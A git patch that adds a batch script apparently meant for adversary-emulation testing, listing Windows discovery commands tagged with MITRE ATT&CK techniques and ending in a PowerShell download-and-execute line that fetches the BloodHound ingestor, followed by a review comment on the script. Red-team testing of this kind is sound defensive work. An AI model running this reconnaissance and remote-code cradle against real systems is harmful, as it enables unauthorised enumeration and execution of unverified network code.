From 61d4797e64718b31cc282a00e8046532f9213790 Mon Sep 17 00:00:00 2001
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag>
Date: Mon, 13 Nov 2017 11:01:57 -0700
Subject: [PATCH] Chain Reaction + New chain reaction
---
.../Chain_Reactions/chain_reaction_02.bat | 56 +++++++++++++++++++
1 file changed, 56 insertions(+)
create mode 100644 ARTifacts/Chain_Reactions/chain_reaction_02.bat
diff --git a/ARTifacts/Chain_Reactions/chain_reaction_02.bat b/ARTifacts/Chain_Reactions/chain_reaction_02.bat
new file mode 100644
index 0000000..b5889e3
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/chain_reaction_02.bat
@@ -0,0 +1,56 @@
+:: Chain Reaction 02
+::
+:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
+:: NOTE We recommend executing from a server that you control.
+:: NOTE Thank You :)
+::
+:: This particular Chain Reaction focuses on enumeration.
+
+:: Tactic: Discovery
+:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
+:: Change IP scheme for your environment
+
+:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
+
+net.exe view
+
+net.exe view /domain
+
+:: Tactic: Discovery
+:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
+
+net localgroup "administrators"
+
+wmic useraccount get /ALL
+
+
+:: Tactic: Discovery
+:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
+
+netsh.exe advfirewall firewall show all profiles
+
+tasklist.exe | findstr cb
+
+tasklist.exe | findstr virus
+
+tasklist.exe | findstr defender
+
+:: Execution
+
+:: Tactic: Discovery
+:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
+
+ipconfig /all
+arp -a
+nbtstat -n
+
+:: Tactic: Discovery
+:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
+
+dir /s c:\ >> %temp%\download
+
+:: Tactic: Execution
+:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
+:: Download and invoke BloodHound Ingestor
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
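Review bot: The final `powershell.exe "IEX (New-Object Net.WebClient).DownloadString(...)"` line fetches `BloodHound_Old.ps1` from the `master` branch of a third-party repository and runs it unverified, so each test run executes whatever that branch holds at the time, which is what the header NOTE lines warn against. For a repeatable and auditable test, point the URL at a reviewed copy on a server you control, or replace `master` with a reviewed commit (`.../BloodHound/<REVIEWED_COMMIT_SHA>/Ingestors/BloodHound_Old.ps1`, placeholder), and record the expected file hash in a `::` comment above the line. Separately, the commented-out sweep uses `%i`, which only works at an interactive prompt: inside a .bat file it must be `%%i`, and `>` should be `>>` or each ping overwrites `ping_output.txt`. The `dir /s c:\ >> %temp%\download` line should quote its target (`"%temp%\download"`), and a `::` comment should tell the operator that this file is left behind and grows on every rerun.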